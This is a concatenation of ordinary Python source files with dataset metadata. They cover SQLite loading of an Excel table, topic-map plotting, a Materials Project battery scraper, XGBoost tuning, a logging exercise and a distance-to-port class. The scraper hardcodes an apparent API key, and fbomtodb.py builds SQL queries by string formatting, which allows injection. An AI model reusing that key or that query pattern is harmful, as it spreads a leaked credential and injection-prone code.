"drawplayer.py", "file_ext": "py", "file_size_in_byte": 3422, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.draw.line", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.font.init", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.draw.circle", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.font.init", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 80, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 80, "usage_type": "attribute"}]} +{"seq_id": "525344208", "text": "import sqlite3\r\nimport pandas as pd\r\nfilename = \"FIORIBOM\"\r\n\r\n# con = sqlite3.connect(filename+\".db\")\r\ncon = sqlite3.connect(\"fbomdb.sqlite\")\r\n#\r\n# CREATE/APPEND TABLE FIORIBOM - NAME SAME AS EXCEL AND SHEET, ACCEPTS XLSX\r\nwb = pd.read_excel(filename+'.xlsx', sheet_name=None)\r\nfor sheet in wb:\r\n wb[sheet].to_sql(sheet, con, index=False, if_exists='append')\r\n #\r\n# GET LENGTH OF TABLE\r\ncur = con.cursor()\r\ncur.execute(\"SELECT * FROM FIORIBOM\")\r\nrows = cur.fetchall()\r\nprint(len(rows))\r\n#\r\n# # GET LENGTH OF TABLE\r\ndef get_release():\r\n con = sqlite3.connect(\"fbomdb.sqlite\")\r\n cur = con.cursor()\r\n cur.execute(\"SELECT DISTINCT ReleaseName FROM FIORIBOM ORDER BY ReleaseName DESC\")\r\n rows = cur.fetchall()\r\n # print(len(rows))\r\n releases = list()\r\n for row 
in rows:\r\n        if(('Wave' not in str(row[0])) and ('SFIN' not in str(row[0]))):\r\n            # print(row[0])\r\n            releases.append(row[0])\r\n    con.commit()\r\n    con.close()\r\n    return releases\r\n\r\ndef get_app_details(release, app_list):\r\n    con = sqlite3.connect(\"fbomdb.sqlite\")\r\n    cur = con.cursor()\r\n    app_details = list()\r\n    for app in app_list:\r\n        # print(app)\r\n        if (app[2] == 'NGUI'):\r\n            # app_query = \"\"\"SELECT P3Area, FioriID, AppName, AppType, ApplicationComponent, FormFactors, BusinessRoleName, PrimaryODataServiceName FROM FIORIBOM WHERE ReleaseName = '\"\"\" + release + \"\"\"', SemanticObject = '\"\"\" + app[0] + \"\"\"', SemanticAction = '\"\"\" + app[1] + \"\"\"'\"\"\"\r\n            app_query = \"SELECT P3Area,\\\r\n                PO,\\\r\n                PortfolioCategory,\\\r\n                FioriID,\\\r\n                AppName,\\\r\n                AppType,\\\r\n                UITechnology,\\\r\n                DeliveryModel,\\\r\n                ApplicationComponent,\\\r\n                AppDocumentationLink,\\\r\n                FormFactors,\\\r\n                BusinessRoleName,\\\r\n                BusinessCatalogName,\\\r\n                PrimaryODataServiceName,\\\r\n                AdditionalODataServices,\\\r\n                'Development:_Product_Owner',\\\r\n                'Development:_Vice_President',\\\r\n                'Development:_Component_Owner',\\\r\n                'Development:_Delivery_Manager',\\\r\n                'IMS:_Main_Manager_Responsible',\\\r\n                'IMS:_VP_Director' FROM FIORIBOM WHERE ReleaseName = '%s' AND SemanticObject = '%s' AND SemanticAction = '%s'\" % (release, app[0], app[1])\r\n            # print(app_query)\r\n            cur.execute(app_query)\r\n            fetched_data = cur.fetchone()\r\n            if fetched_data is not None:\r\n                app_details.append(fetched_data)\r\n                # print(app_details)\r\n    con.commit()\r\n    con.close()\r\n    # print(app_details)\r\n    return app_details\r\n# channel = SelectField('Channel',choices=a,)\r\n\r\n# cur = con.cursor()\r\n# cur.execute(\"DROP TABLE FIORIBOM\")\r\n\r\n# DELETE ALL ENTRIES FROM TABLE\r\n# cur = con.cursor()\r\n# cur.execute(\"DELETE FROM FIORIBOM\")\r\n# rows = cur.fetchall()\r\n# print(len(rows))\r\n\r\n# cur = con.cursor()\r\n# cur.execute(\"SELECT * FROM FIORIBOM WHERE ReleaseName = 'S/4HANA 1511'\")\r\n# rows = cur.fetchall()\r\n# print(len(rows))\r\n\r\n# cur = con.cursor()\r\n# cur.execute(\"SELECT AppName, AppType FROM FIORIBOM WHERE ReleaseName = 'S/4HANA 1511' AND SemanticObject = 'Project' AND SemanticAction = 'analyzePlanActual'\")\r\n# rows = cur.fetchall()\r\n# for row in rows:\r\n#     print(row[0])\r\n#     print(row[1])\r\n\r\n# AppName = cur.fetchone()[0]\r\n# print(AppName)\r\n# AppType = cur.fetchone()[1]\r\n# print(AppType)\r\n\r\n# if cur.getCount() > 0:\r\n#     cur.moveToFirst()\r\n#     AppName = cur.getString(cur.getColumnIndex(\"AppName\"));\r\n#     print(AppName)\r\n\r\n\r\n\r\ncon.commit()\r\ncon.close()\r\n", "sub_path": "fbomtodb.py", "file_name": "fbomtodb.py", "file_ext": "py", "file_size_in_byte": 3993, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sqlite3.connect", "line_number": 6, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "223867870", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 25 18:00:23 2016\n\n@author: limeng\n\n\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\nfrom matplotlib.colors import LinearSegmentedColormap\n\nDMR_STATE = 'output/dmr.state'\nDMR_PARAMETER = 'output/dmr.parameters'\nDMR_FEATURES = 'output/features.txt'\n\nTOPIC_K = 
8\n\n# 读出每个词对应的主题内容\n# {doc: {word : topic}}\nword_topic_mapping = dict()\nwith open(DMR_STATE, 'r') as f:\n next(f)\n for line in f:\n record = line.split()\n idx = record[0]\n if idx not in word_topic_mapping:\n word_topic_mapping[idx] = dict()\n word_topic_mapping[idx][record[-2]] = int(record[-1])\n\nprint('Extract topic for each word ...')\n\n# 统计不同位置主题出现的频率\n# {position : {topic : cnt}}\nposition_topic_mapping = dict()\nwith open(DMR_FEATURES, 'r') as f:\n for idx, line in enumerate(f):\n position = line.split()[0]\n if position not in position_topic_mapping:\n topic_list = np.zeros(TOPIC_K)\n \n # 对于每个文档,计算主题分布,并累加到对应的位置上\n parr = np.zeros(TOPIC_K)\n if str(idx) not in word_topic_mapping:\n continue\n for word, word_topic in word_topic_mapping[str(idx)].items():\n parr[word_topic] += 1\n parr = parr / np.sum(parr)\n topic_list = topic_list + parr\n position_topic_mapping[position] = topic_list\n\nprint('Topic for each position ...')\n\n# 归一化\ntmp_map = dict()\nfor loc, topic in position_topic_mapping.items():\n tmp_map[loc] = topic / np.sum(topic)\n \nposition_topic_mapping = tmp_map\nprint('Normalization ...')\n\n# 对于所有的地理位置,以中心地点为标记绘制指定主题的热图\nfor topic_num in range(TOPIC_K):\n # m = Basemap(projection='ortho',lon_0=0,lat_0=0,resolution='l',\\\n # llcrnrx=-1000*1000,llcrnry=-1000*1000,\n # urcrnrx=+1150*1000,urcrnry=+1700*1000)\n \n print(\"Plotting for topic: \", topic_num)\n m = Basemap(llcrnrlon=-180,llcrnrlat=-80,\n urcrnrlon=180,urcrnrlat=80,projection='mill')\n m.drawcoastlines()\n m.drawcountries()\n # m.drawstates()\n \n lon_bins = np.linspace(-180, 180, 72) # 36 bins\n lat_bins = np.linspace(-80, 80, 36) # 72 bins\n density = np.zeros([36, 72])\n \n for x, y in np.ndindex(density.shape):\n loc_str = 'lbloc_' + str(x) + '_' + str(y)\n if loc_str not in position_topic_mapping:\n continue\n density[x][y] = position_topic_mapping[loc_str][topic_num]\n \n lon_bins_2d, lat_bins_2d = np.meshgrid(lon_bins, lat_bins)\n xs, ys = m(lon_bins_2d, lat_bins_2d) # will be plotted using pcolormesh\n \n cdict = {'red': ( (0.0, 1.0, 1.0),\n (1.0, 0.9, 1.0) ),\n 'green':( (0.0, 1.0, 1.0),\n (1.0, 0.03, 0.0) ),\n 'blue': ( (0.0, 1.0, 1.0),\n (1.0, 0.16, 0.0) ) }\n custom_map = LinearSegmentedColormap('custom_map', cdict)\n plt.register_cmap(cmap=custom_map)\n \n plt.pcolormesh(xs, ys, density, cmap=\"custom_map\")\n plt.show()\n # xs.shape = (72, 36)\n # ys.shape = (72, 36)\n\n", "sub_path": "dmr/plot_location.py", "file_name": "plot_location.py", "file_ext": "py", "file_size_in_byte": 3249, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 59, "usage_type": "call"}, {"api_name": "mpl_toolkits.basemap.Basemap", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.ndindex", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.colors.LinearSegmentedColormap", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.register_cmap", "line_number": 97, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pcolormesh", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}]} +{"seq_id": "258105633", "text": "#!/usr/bin/python\n\nimport requests\nfrom pandas import DataFrame\n\n\ndef scrape_batteries(working_ion, filter_property=\"average_voltage\"):\n print(\"Scraping batteries from battery-explorer\")\n print(\"Working ion: {}\".format(working_ion))\n print(\"Filtering property: {}\".format(filter_property))\n\n batteries = {}\n\n # Scrape over the full range of average voltage in the materials database\n for i in range(0, 150):\n url = 'https://www.materialsproject.org/batteries/search?query={{\"working_ion\":{{\"$in\":[\"{ion}\"]}},\"average_voltage\":{{\"$gte\":{0},\"$lte\":{1}}}}}' \\\n .format(-2.1 + i / 10.0, -1.9 + i / 10.0, ion=working_ion, property=filter_property)\n\n response = requests.get(url)\n response_batteries_list = response.json()\n\n assert response.status_code == 200\n assert isinstance(response_batteries_list, list)\n assert not isinstance(response_batteries_list, dict)\n\n for battery in response_batteries_list:\n batteries[battery[\"battid\"]] = battery\n\n print('Found {} batteries and {} unique batteries so far. Searches run: {}' \\\n .format(len(batteries), len(set(batteries)), i))\n\n return batteries\n\n\ndef fetch_battery_from_api(battery, apikey):\n print(\"Scraping battery {}\".format(battery[\"battid\"]))\n\n api_key_header = {\"X-API-KEY\": apikey}\n url = \"https://www.materialsproject.org/rest/v2/battery/{}\".format(battery[\"battid\"])\n battery_get = requests.get(url, headers=api_key_header)\n response_obj = battery_get.json()\n\n assert battery_get.status_code == 200\n assert response_obj[\"valid_response\"] == True\n\n battery_data = response_obj[\"response\"][0]\n\n if len(battery_data[\"adj_pairs\"]) > 2:\n print(\"Found a battery with too many materials, write code to handle it. 
{} material pairs found.\"\n .format(len(battery_data[\"adj_pairs\"])))\n return None\n\n return (battery_data[\"battid\"], battery_data)\n\n\ndef compose_battery_data(battery):\n print(battery)\n return [battery[\"battid\"],\n battery[\"adj_pairs\"][0]['id_discharge'],\n battery[\"adj_pairs\"][0]['id_charge'],\n battery['reduced_cell_formula'],\n battery['type'],\n #battery['spacegroup']['symbol'],\n battery['average_voltage'],\n battery['capacity_grav'],\n battery['capacity_vol'],\n battery['energy_grav'],\n battery['energy_vol'],\n battery[\"adj_pairs\"][0]['stability_charge'],\n battery[\"adj_pairs\"][0]['stability_discharge']]\n\n\n\ndef scrape_battery_data_to_csv(working_ion, output_filename, apikey):\n print(\"Fetching batteries from Materials Project\")\n\n batteries_list = scrape_batteries(working_ion=working_ion)\n\n print(\"Found {} batteries with working ion {}\".format(len(batteries_list.values()), working_ion))\n\n battery_materials = dict(filter(\n lambda element: element != None,\n [fetch_battery_from_api(battery, apikey) for battery in batteries_list.values()]))\n\n print(\"Fetched {} battery data objects from rest api\".format(len(battery_materials.values())))\n\n data_columns = ['Battid',\n 'Discharged_ID',\n 'Charged_ID',\n 'Reduced_Cell_Formula',\n 'Type',\n #'Spacegroup',\n 'Average_Voltage',\n 'Capacity_Grav',\n 'Capacity_Vol',\n 'Specific_E_Wh/kg',\n 'E Density Wh/l',\n 'Stability Charge',\n 'Stability Discharge']\n\n battery_data = [compose_battery_data(battery) for battery in list(battery_materials.values())]\n\n df = DataFrame.from_records(battery_data, columns=data_columns)\n\n print(\"Exporting selected battery data to file: {}\".format(output_filename))\n df.to_csv(output_filename, index=False)\n\n\n# Example for scraping all Mg-batteries and exporting them to mg_batteries.csv\n#scrape_battery_data_to_csv(\"Mg\", \"mg_batteries.csv\", \"GKDHNwKre8uiowqhPh\")\n# atomtypes = ['Y','Na','Al','Zn'] \n\n# for i in atomtypes:\n# filename = i + '_batteries.csv'\n# print('i: ', i )\n# print('Filename: ', filename)\n# scrape_battery_data_to_csv(i, filename, \"GKDHNwKre8uiowqhPh\")\n\n \n\nscrape_battery_data_to_csv(\"Mg\", \"Mg_batteries.csv\", \"GKDHNwKre8uiowqhPh\")\n\n\n\n\n\n", "sub_path": "0_mp_battery_scrape.py", "file_name": "0_mp_battery_scrape.py", "file_ext": "py", "file_size_in_byte": 4379, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_records", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 103, "usage_type": "name"}]} +{"seq_id": "38799783", "text": "from custom.model_development import display_results, getstats_fromstream\nfrom custom.model_development import load_datasets, make_datasets\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pathlib import Path\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import accuracy_score, precision_score\nfrom sklearn.metrics import recall_score, make_scorer\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.model_selection import RepeatedStratifiedKFold, train_test_split\nimport xgboost as xgb\nfrom xgboost.sklearn import XGBClassifier\n\n#set types and number of examples from each class in each set\nset_types = ['training', 'test']\nnum_ex = [260, 64]\ndatasets_dict = 
dict(zip(set_types, num_ex))\n\nclass_names = ['empty', 'cloud']\nseed = 52\n\nparams_file = Path('/home/bob/development/experiment_data/2018/'\n 'cloudparams_s20.csv')\n\ndir_training_images = ('/home/bob/development/atomic_cloud_training_data/'\n 'training_data')\n\npath_images_left = Path(dir_training_images, 'left_clouds/seed_13')\npath_images_right = Path(dir_training_images, 'right_clouds/seed_31')\n\ndir_model_main = ('/home/bob/development/ml_algorithms/atomic_cloud/'\n 'gbc_binary_classify/models')\n\npath_model_id = Path(dir_model_main, f'num_ex_{num_ex[0]}_seed_{seed}')\n\n#Tune using training set of left-side clouds.\nmake_datasets(class_names, datasets_dict, path_images_left, path_model_id, seed)\n\nX_L, X_test_L, y_L, y_test_L = load_datasets(path_model_id,\n path_images_left)\n\n_, scale_L, _ = getstats_fromstream(path_model_id, path_images_left)\nscale_rnd_L = np.around(scale_L)\nX_scl_L = X_L / scale_rnd_L\nX_test_scl_L = X_test_L / scale_rnd_L\n\nX_train_scl_L, X_eval_scl_L, y_train_L, y_eval_L = train_test_split(\n X_scl_L, y_L, train_size=0.8, random_state=123)\n\n#Tune using training set of right-side clouds.\n#make_datasets(class_names, datasets_dict, path_images_right, path_model_id, seed)\n#\n#X_R, X_test_R, y_train_R, y_R = load_datasets(path_model_id,\n# path_images_right)\n#\n#_, scale_R, _ = getstats_fromstream(path_model_id, path_images_right)\n#scale_rnd_R = np.around(scale_R)\n#X_scl_R = X_R / scale_rnd_R\n#X_test_scl_R = X_test_R / scale_rnd_R\n\n#Tuning stages.\n\n#Stage 1 - Search for learning_rate\n#var_params = {'colsample_bytree': 0.15,\n# 'gamma': 0,\n# 'max_depth': 10,\n# 'min_child_weight': 3,\n# 'reg_alpha': 0,\n# 'reg_lambda': 0,\n# 'subsample': 1}\n#learning_rates = [0.0001, 0.001, 0.01, 0.1, 1]\n#params_grid = [{'learning_rate': learning_rates}]\n\n#Stage 2 - Search for max_depth and min_child_weight.\n#var_params = {'colsample_bytree': 0.15,\n# 'gamma': 0,\n# 'learning_rate': 0.001,\n# 'reg_alpha': 0,\n# 'reg_lambda': 0,\n# 'subsample': 1}\n##max_depth = [3, 7, 11, 15, 19, 24]\n##min_child_weight = [1, 3, 5, 7, 9]\n#max_depth = [5, 20, 50, 75, 100]\n#min_child_weight = [3, 10, 20, 30]\n#params_grid = [{'max_depth': max_depth,\n# 'min_child_weight': min_child_weight}]\n#param_dists = params_grid\n#n_iter = 18\n\n#Stage 3 - Search for colsample_bytree and subsample.\n#var_params = {'gamma': 0,\n# 'learning_rate': 0.001,\n# 'max_depth': 9,\n# 'min_child_weight': 5,\n# 'reg_alpha': 0,\n# 'reg_lambda': 0}\n#colsample_bytree = [0.02, 0.05, 0.1, 0.2, 0.5]\n#colsample_bytree = [i/10 + 0.05 for i in range(1, 5)]\n#subsample = [i / 10 for i in range(2, 11, 2)]\n#params_grid = [{'colsample_bytree': colsample_bytree,\n# 'subsample': subsample}]\n#param_dists = params_grid\n#n_iter = 25\n\n#Stage 4 - Search for gamma, reg_alpha and reg_lambda.\n#var_params = {'colsample_bytree': 0.35,\n# 'learning_rate': 0.001,\n# 'max_depth': 9,\n# 'min_child_weight': 5,\n# 'subsample': 0.4}\n#gamma = [0.001, 0.01, 0.1, 1, 10]\n#reg_alpha = [0.001, 0.01, 0.1, 1, 10]\n#reg_lambda = [0.001, 0.01, 0.1, 1, 10]\n#gamma = [0.01, 0.1, 1]\n#reg_alpha = [10, 100, 1000]\n#reg_lambda = [10, 100, 1000]\n#params_grid = [{'gamma': gamma, 'reg_alpha': reg_alpha, 'reg_lambda': [0]},\n# {'gamma': gamma, 'reg_alpha': [0], 'reg_lambda': reg_lambda}]\n#gamma = [0.1]\n#reg_lambda = [i * 10 for i in range(1, 11)]\n#params_grid = [{'gamma': gamma, 'reg_alpha': [0], 'reg_lambda': reg_lambda}]\n#param_dists = params_grid\n#n_iter = 25\n\n#Stage 5 - Check learning_rate again.\nvar_params = 
{'colsample_bytree': 0.35,\n 'gamma': 0.1,\n 'max_depth': 9,\n 'min_child_weight': 5,\n 'reg_alpha': 0,\n 'reg_lambda': 100,\n 'subsample': 0.4}\nlearning_rates = [i / 10000 for i in range(5, 16)]\nparams_grid = [{'learning_rate': learning_rates}]\n\nearly_stopping_rounds = 20\neval_set = [(X_eval_scl_L, y_eval_L)]\nfixed_params = {'n_estimators': 500,\n 'random_state': 10,\n 'verbosity': 0}\n\nestimator = XGBClassifier(**fixed_params, **var_params)\n\ncrossval = RepeatedStratifiedKFold(n_splits=6, n_repeats=3, random_state=3)\n\nmy_prec_scorer = make_scorer(precision_score, pos_label=class_names[0])\nmy_recall_scorer = make_scorer(recall_score, pos_label=class_names[0])\n\nmetrics = {'accuracy': make_scorer(accuracy_score),\n 'precision': my_prec_scorer,\n 'recall': my_recall_scorer}\n\nprint(f'# Tuning hyper-parameters')\nprint()\n\nsearch_params = {'estimator': estimator,\n 'cv': crossval,\n 'scoring': metrics,\n 'refit': False}\n\nmodel_search = GridSearchCV(**search_params,\n param_grid=params_grid)\n\n#model_search = RandomizedSearchCV(**search_params,\n# param_distributions=param_dists,\n# n_iter=n_iter)\n\n#Fit model with left-side clouds.\nmodel_search.fit(X_train_scl_L, y_train_L, eval_set=eval_set,\n eval_metric='auc', early_stopping_rounds=20,\n verbose=False)\n\n#Fit model with right-side clouds.\n#model_search.fit(X_train_scl_R, y_train_R, eval_set=eval_set,\n# eval_metric='auc', early_stopping_rounds=20,\n# verbose=False)\n\n#print(\"Grid scores by metric on development set:\")\n#print()\n\nresults = model_search.cv_results_\ndisplay_results(results, metrics)\n\n# Run this to check performance on the test set.\n#model_L_params = {'colsample_bytree': 0.35,\n# 'gamma': 0.1,\n# 'learning_rate': 0.001,\n# 'max_depth': 9,\n# 'min_child_weight': 5,\n# 'n_estimators': 500,\n# 'random_state': 10,\n# 'reg_alpha': 0,\n# 'reg_lambda': 100,\n# 'subsample': 0.4,\n# 'random_state': 10,\n# 'verbosity': 0}\n#model_L = XGBClassifier(**model_L_params)\n#model_L.fit(X_train_scl_L, y_train_L, eval_set=eval_set,\n# eval_metric='auc', early_stopping_rounds=20,\n# verbose=False)\n#print(\"Detailed classification report:\")\n#print()\n#y_true, y_pred = y_test_L, model_search.predict(X_test_scl_L)\n#print(classification_report(y_true, y_pred))\n#print()\n", "sub_path": "tune_gbc_model.py", "file_name": "tune_gbc_model.py", "file_ext": "py", "file_size_in_byte": 7354, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 22, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 28, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 29, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 34, "usage_type": "call"}, {"api_name": "custom.model_development.make_datasets", "line_number": 37, "usage_type": "call"}, {"api_name": "custom.model_development.load_datasets", "line_number": 39, "usage_type": "call"}, {"api_name": "custom.model_development.getstats_fromstream", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 47, "usage_type": "call"}, {"api_name": "xgboost.sklearn.XGBClassifier", "line_number": 142, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RepeatedStratifiedKFold", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.metrics.make_scorer", "line_number": 146, "usage_type": "call"}, 
{"api_name": "sklearn.metrics.precision_score", "line_number": 146, "usage_type": "argument"}, {"api_name": "sklearn.metrics.make_scorer", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 147, "usage_type": "argument"}, {"api_name": "sklearn.metrics.make_scorer", "line_number": 149, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 149, "usage_type": "argument"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 161, "usage_type": "call"}, {"api_name": "custom.model_development.display_results", "line_number": 182, "usage_type": "call"}]} +{"seq_id": "455730397", "text": "\"\"\"\n#1. whitespace before '('\ndef f ():\n print(\"Hello\")\nf()\n\n#2. missing whitespace arount operator\nprint(5+ 4)\n\n#3. missing whitespace after ','\nprint([2,3,4])\n\n#4. unexpected spaces around keyword / parameter equals\ndef f(arg=0):\n return 2**arg\nf(arg = 2)\n\n#5. expected 2 blank lines, found 1\ndef f1():\n return \"Hello\"\n\ndef f2():\n return \"World\"\n\n#6. multiple statements on one line (color)\nif True: print(\"hello\")\n\n#7. multiple statements on one line (semicolon)\nprint(\"hello\"); print(\"world\")\n\n#8. comparison to None should be 'if cond is None:'\ndef f(x):\n if x % 2 == 0:\n return True\n\nr = f(x)\n\nif r == None:\n print(\"odd\")\n\n#9. comparison to True should be 'if cond is True:' or 'if cond:'\ndef f(x):\n if x % 2 == 0:\n return True\n\nr = f(x)\n\nif r == True:\n print(\"even\")\n\n\"\"\"\nfrom printermodule import *\n\ntry:\n\thello() # hello\n\tworld() # world\nexcept:\n\tpass \n\nimport helloworldpkg.hello\nimport helloworldpkg.world\n\nhelloworldpkg.hello.printh()\nhelloworldpkg.world.printw()\n\nimport logging\nimport traceback\n\nlogging.basicConfig(filename='logfile.log', filemode='w', level=logging.INFO)\nlogging.raiseExceptions = True\n\ndef div(a, b):\n\ttry:\n\t\treturn a/b, None\n\texcept Exception as e:\n\t\treturn e, traceback.format_exc()\n\ndef run_with_log(func, a, b):\n\tout, trace = div(a,b)\n\tif trace is not None:\n\t\treturn logging.exception(f'{out}\\n{trace}')\n\nrun_with_log(div, 6, 3)\nrun_with_log(div, 6, 0)\nrun_with_log(div, \"5\", 2)", "sub_path": "prac3.py", "file_name": "prac3.py", "file_ext": "py", "file_size_in_byte": 1454, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "helloworldpkg.hello.hello.printh", "line_number": 63, "usage_type": "call"}, {"api_name": "helloworldpkg.hello.hello", "line_number": 63, "usage_type": "attribute"}, {"api_name": "helloworldpkg.hello", "line_number": 63, "usage_type": "name"}, {"api_name": "helloworldpkg.hello.world.printw", "line_number": 64, "usage_type": "call"}, {"api_name": "helloworldpkg.hello.world", "line_number": 64, "usage_type": "attribute"}, {"api_name": "helloworldpkg.hello", "line_number": 64, "usage_type": "name"}, {"api_name": "logging.basicConfig", "line_number": 69, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.raiseExceptions", "line_number": 70, "usage_type": "attribute"}, {"api_name": "traceback.format_exc", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "538238280", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCompute least-cost distance to port\n\"\"\"\nfrom concurrent.futures import as_completed\nimport geopandas as gpd\nimport logging\nimport numpy 
as np\nimport os\nimport pandas as pd\nfrom scipy.spatial import cKDTree\nfrom skimage.graph import MCP_Geometric\nimport time\nfrom warnings import warn\n\nfrom reV.handlers.exclusions import ExclusionLayers\nfrom reVX.utilities import ExclusionsConverter\nfrom reVX.utilities.utilities import log_versions, coordinate_distance\nfrom rex.utilities.execution import SpawnProcessPool\nfrom rex.utilities.loggers import log_mem\nfrom rex.utilities.utilities import (check_res_file, get_lat_lon_cols,\n parse_table, row_col_indices)\n\nlogger = logging.getLogger(__name__)\n\n\nclass DistanceToPorts:\n \"\"\"\n Class to compute the least cost distance from offshore pixels to port\n locations. The distance to coast exclusion layer will be used to calculate\n least cost paths around land masses and other such obstructions. Produces\n the least cost distance from each offshore pixel to the nearest port. If\n a distance to port layer already exists it can be updated with the least\n cost distance to new ports.\n\n NOTE: Computing the least cost distance is both memory and computationally\n intensive! On EAGLE a bigmem node was needed to run in parallel and a\n medium (178GB) memory node is needed to run in serial.\n \"\"\"\n def __init__(self, ports, excl_fpath, input_dist_layer='dist_to_coast'):\n \"\"\"\n Parameters\n ----------\n ports : str\n Path to shape, csv, or json file containing ports to compute\n least cost distance to\n excl_fpath: str\n Path to exclusions .h5 file with distance to coast layer\n input_dist_layer : str, optional\n Exclusions layer name with distance to coast,\n by default 'dist_to_coast'\n \"\"\"\n log_versions(logger)\n self._input_dist_layer = input_dist_layer\n self._ports_fpath = ports\n self._ports, self._cost_arr, self._profile = self._parse_ports(\n ports, excl_fpath, input_dist_layer=input_dist_layer)\n log_mem(logger)\n\n def __repr__(self):\n msg = \"{} from {}\".format(self.__class__.__name__, self.ports)\n\n return msg\n\n @property\n def ports(self):\n \"\"\"\n DataFrame of port locations\n\n Returns\n -------\n DataFrame\n \"\"\"\n return self._ports\n\n @property\n def cost_arr(self):\n \"\"\"\n Cost array, used to compute least cost distance to ports\n Offshore pixels have a value of 90 (pixel size), onshore pixels have a\n value of -1\n\n Returns\n -------\n ndarray\n \"\"\"\n return self._cost_arr\n\n @classmethod\n def _parse_lat_lons(cls, excl_fpath, input_dist_layer='dist_to_coast'):\n \"\"\"\n Parse cost array, profile, and latitude and longitude coordinates\n\n 